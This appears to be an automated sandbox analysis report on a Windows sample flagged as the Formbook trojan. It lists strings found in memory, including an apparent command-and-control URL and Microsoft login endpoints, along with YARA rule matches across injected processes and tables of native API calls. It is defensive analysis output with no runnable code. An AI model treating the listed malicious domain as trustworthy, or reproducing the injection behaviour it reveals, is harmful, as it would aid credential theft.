Source: file.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: file.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: unlodctr.exe, 00000006.00000002.3272273995.0000000003B24000.00000004.10000000.00040000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271958876.0000000003944000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2907843515.00000000336C4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: SIsaiIITJVPvUAG.exe, 00000007.00000002.3271198563.0000000001622000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.quantumboulevard.xyz
Source: SIsaiIITJVPvUAG.exe, 00000007.00000002.3271198563.0000000001622000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.quantumboulevard.xyz/qruc/
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unlodctr.exe, 00000006.00000002.3272273995.0000000003E48000.00000004.10000000.00040000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3273698475.0000000006110000.00000004.00000800.00020000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271958876.0000000003C68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://domaincntrol.com/?orighost=
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000096F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000096F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000096F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000096F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000096F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: unlodctr.exe, 00000006.00000002.3270803380.000000000096F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unlodctr.exe, 00000006.00000003.2800910241.0000000007B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: unlodctr.exe, 00000006.00000002.3272273995.0000000003E48000.00000004.10000000.00040000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3273698475.0000000006110000.00000004.00000800.00020000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000002.3271958876.0000000003C68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://nojs.domaincntrol.com
Source: file.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unlodctr.exe, 00000006.00000002.3273907371.0000000007C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3271480476.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3270633150.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3271525357.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3271198563.0000000001580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588306707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588682104.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3271543512.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2590213953.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3271480476.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3270633150.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3271525357.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3271198563.0000000001580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2588306707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2588682104.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3271543512.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2590213953.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0042AE33 NtClose, 2_2_0042AE33
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2B60 NtClose,LdrInitializeThunk, 2_2_010E2B60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_010E2DF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_010E2C70
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E35C0 NtCreateMutant,LdrInitializeThunk, 2_2_010E35C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E4340 NtSetContextThread, 2_2_010E4340
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E4650 NtSuspendThread, 2_2_010E4650
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2B80 NtQueryInformationFile, 2_2_010E2B80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2BA0 NtEnumerateValueKey, 2_2_010E2BA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2BE0 NtQueryValueKey, 2_2_010E2BE0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2BF0 NtAllocateVirtualMemory, 2_2_010E2BF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2AB0 NtWaitForSingleObject, 2_2_010E2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2AD0 NtReadFile, 2_2_010E2AD0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2AF0 NtWriteFile, 2_2_010E2AF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2D00 NtSetInformationFile, 2_2_010E2D00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2D10 NtMapViewOfSection, 2_2_010E2D10
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2D30 NtUnmapViewOfSection, 2_2_010E2D30
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2DB0 NtEnumerateKey, 2_2_010E2DB0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2DD0 NtDelayExecution, 2_2_010E2DD0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2C00 NtQueryInformationProcess, 2_2_010E2C00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2C60 NtCreateKey, 2_2_010E2C60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2CA0 NtQueryInformationToken, 2_2_010E2CA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2CC0 NtQueryVirtualMemory, 2_2_010E2CC0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2CF0 NtOpenProcess, 2_2_010E2CF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2F30 NtCreateSection, 2_2_010E2F30
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2F60 NtCreateProcessEx, 2_2_010E2F60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2F90 NtProtectVirtualMemory, 2_2_010E2F90
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2FA0 NtQuerySection, 2_2_010E2FA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2FB0 NtResumeThread, 2_2_010E2FB0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2FE0 NtCreateFile, 2_2_010E2FE0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2E30 NtWriteVirtualMemory, 2_2_010E2E30
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2E80 NtReadVirtualMemory, 2_2_010E2E80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2EA0 NtAdjustPrivilegesToken, 2_2_010E2EA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E2EE0 NtQueueApcThread, 2_2_010E2EE0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E3010 NtOpenDirectoryObject, 2_2_010E3010
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E3090 NtSetValueKey, 2_2_010E3090
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E39B0 NtGetContextThread, 2_2_010E39B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E3D10 NtOpenProcessToken, 2_2_010E3D10
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E3D70 NtOpenThread, 2_2_010E3D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03184340 NtSetContextThread,LdrInitializeThunk, 6_2_03184340
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03184650 NtSuspendThread,LdrInitializeThunk, 6_2_03184650
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182B60 NtClose,LdrInitializeThunk, 6_2_03182B60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182BA0 NtEnumerateValueKey,LdrInitializeThunk, 6_2_03182BA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_03182BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182BE0 NtQueryValueKey,LdrInitializeThunk, 6_2_03182BE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182AD0 NtReadFile,LdrInitializeThunk, 6_2_03182AD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182AF0 NtWriteFile,LdrInitializeThunk, 6_2_03182AF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182F30 NtCreateSection,LdrInitializeThunk, 6_2_03182F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182FB0 NtResumeThread,LdrInitializeThunk, 6_2_03182FB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182FE0 NtCreateFile,LdrInitializeThunk, 6_2_03182FE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_03182E80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182EE0 NtQueueApcThread,LdrInitializeThunk, 6_2_03182EE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_03182D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_03182D30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182DD0 NtDelayExecution,LdrInitializeThunk, 6_2_03182DD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_03182DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_03182C70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182C60 NtCreateKey,LdrInitializeThunk, 6_2_03182C60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_03182CA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031835C0 NtCreateMutant,LdrInitializeThunk, 6_2_031835C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031839B0 NtGetContextThread,LdrInitializeThunk, 6_2_031839B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182B80 NtQueryInformationFile, 6_2_03182B80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182AB0 NtWaitForSingleObject, 6_2_03182AB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182F60 NtCreateProcessEx, 6_2_03182F60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182F90 NtProtectVirtualMemory, 6_2_03182F90
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182FA0 NtQuerySection, 6_2_03182FA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182E30 NtWriteVirtualMemory, 6_2_03182E30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182EA0 NtAdjustPrivilegesToken, 6_2_03182EA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182D00 NtSetInformationFile, 6_2_03182D00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182DB0 NtEnumerateKey, 6_2_03182DB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182C00 NtQueryInformationProcess, 6_2_03182C00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182CC0 NtQueryVirtualMemory, 6_2_03182CC0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03182CF0 NtOpenProcess, 6_2_03182CF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03183010 NtOpenDirectoryObject, 6_2_03183010
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03183090 NtSetValueKey, 6_2_03183090
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03183D10 NtOpenProcessToken, 6_2_03183D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03183D70 NtOpenThread, 6_2_03183D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00847660 NtCreateFile, 6_2_00847660
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_008477C0 NtReadFile, 6_2_008477C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_008478A0 NtDeleteFile, 6_2_008478A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00847930 NtClose, 6_2_00847930
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00847A80 NtAllocateVirtualMemory, 6_2_00847A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA1390 0_2_02DA1390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA34D8 0_2_02DA34D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA25D1 0_2_02DA25D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA0870 0_2_02DA0870
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA1C08 0_2_02DA1C08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA12F8 0_2_02DA12F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA33EF 0_2_02DA33EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA33A9 0_2_02DA33A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA51B0 0_2_02DA51B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5750 0_2_02DA5750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5740 0_2_02DA5740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5530 0_2_02DA5530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5520 0_2_02DA5520
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5B49 0_2_02DA5B49
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5978 0_2_02DA5978
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA5968 0_2_02DA5968
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA4E90 0_2_02DA4E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02DA4EA0 0_2_02DA4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F94A 2_2_0040F94A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F953 2_2_0040F953
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0042D273 2_2_0042D273
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004162F3 2_2_004162F3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00403280 2_2_00403280
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040FB73 2_2_0040FB73
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040DBF3 2_2_0040DBF3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00401D66 2_2_00401D66
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00401D70 2_2_00401D70
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00402640 2_2_00402640
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00402635 2_2_00402635
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0100 2_2_010A0100
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114A118 2_2_0114A118
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01138158 2_2_01138158
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011641A2 2_2_011641A2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011701AA 2_2_011701AA
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011681CC 2_2_011681CC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01142000 2_2_01142000
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116A352 2_2_0116A352
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011703E6 2_2_011703E6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BE3F0 2_2_010BE3F0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150274 2_2_01150274
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011302C0 2_2_011302C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0535 2_2_010B0535
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01170591 2_2_01170591
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01154420 2_2_01154420
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01162446 2_2_01162446
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115E4F6 2_2_0115E4F6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D4750 2_2_010D4750
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0770 2_2_010B0770
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AC7C0 2_2_010AC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CC6E0 2_2_010CC6E0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C6962 2_2_010C6962
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B29A0 2_2_010B29A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0117A9A6 2_2_0117A9A6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BA840 2_2_010BA840
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B2840 2_2_010B2840
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010968B8 2_2_010968B8
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010DE8F0 2_2_010DE8F0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116AB40 2_2_0116AB40
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01166BD7 2_2_01166BD7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AEA80 2_2_010AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BAD00 2_2_010BAD00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114CD1F 2_2_0114CD1F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C8DBF 2_2_010C8DBF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010AADE0 2_2_010AADE0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0C00 2_2_010B0C00
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01150CB5 2_2_01150CB5
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A0CF2 2_2_010A0CF2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01152F30 2_2_01152F30
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F2F28 2_2_010F2F28
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010D0F30 2_2_010D0F30
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01124F40 2_2_01124F40
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0112EFA0 2_2_0112EFA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A2FC8 2_2_010A2FC8
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BCFE0 2_2_010BCFE0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116EE26 2_2_0116EE26
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B0E59 2_2_010B0E59
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116CE93 2_2_0116CE93
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010C2E90 2_2_010C2E90
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116EEDB 2_2_0116EEDB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010E516C 2_2_010E516C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109F172 2_2_0109F172
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0117B16B 2_2_0117B16B
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010BB1B0 2_2_010BB1B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B70C0 2_2_010B70C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115F0CC 2_2_0115F0CC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116F0E0 2_2_0116F0E0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011670E9 2_2_011670E9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116132D 2_2_0116132D
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0109D34C 2_2_0109D34C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F739A 2_2_010F739A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B52A0 2_2_010B52A0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CB2C0 2_2_010CB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011512ED 2_2_011512ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01167571 2_2_01167571
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114D5B0 2_2_0114D5B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116F43F 2_2_0116F43F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010A1460 2_2_010A1460
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116F7B0 2_2_0116F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_011616CC 2_2_011616CC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01145910 2_2_01145910
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B9950 2_2_010B9950
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CB950 2_2_010CB950
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0111D800 2_2_0111D800
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B38E0 2_2_010B38E0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116FB76 2_2_0116FB76
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CFB80 2_2_010CFB80
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01125BF0 2_2_01125BF0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010EDBF9 2_2_010EDBF9
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01167A46 2_2_01167A46
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116FA49 2_2_0116FA49
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01123A6C 2_2_01123A6C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010F5AA0 2_2_010F5AA0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01151AA3 2_2_01151AA3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0114DAAC 2_2_0114DAAC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0115DAC6 2_2_0115DAC6
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B3D40 2_2_010B3D40
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01161D5A 2_2_01161D5A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01167D73 2_2_01167D73
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010CFDC0 2_2_010CFDC0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_01129C32 2_2_01129C32
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116FCF2 2_2_0116FCF2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116FF09 2_2_0116FF09
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B1F92 2_2_010B1F92
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0116FFB1 2_2_0116FFB1
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_010B9EB0 2_2_010B9EB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320A352 6_2_0320A352
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032103E6 6_2_032103E6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0315E3F0 6_2_0315E3F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031F0274 6_2_031F0274
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031D02C0 6_2_031D02C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031EA118 6_2_031EA118
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03140100 6_2_03140100
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031D8158 6_2_031D8158
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032041A2 6_2_032041A2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032101AA 6_2_032101AA
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032081CC 6_2_032081CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031E2000 6_2_031E2000
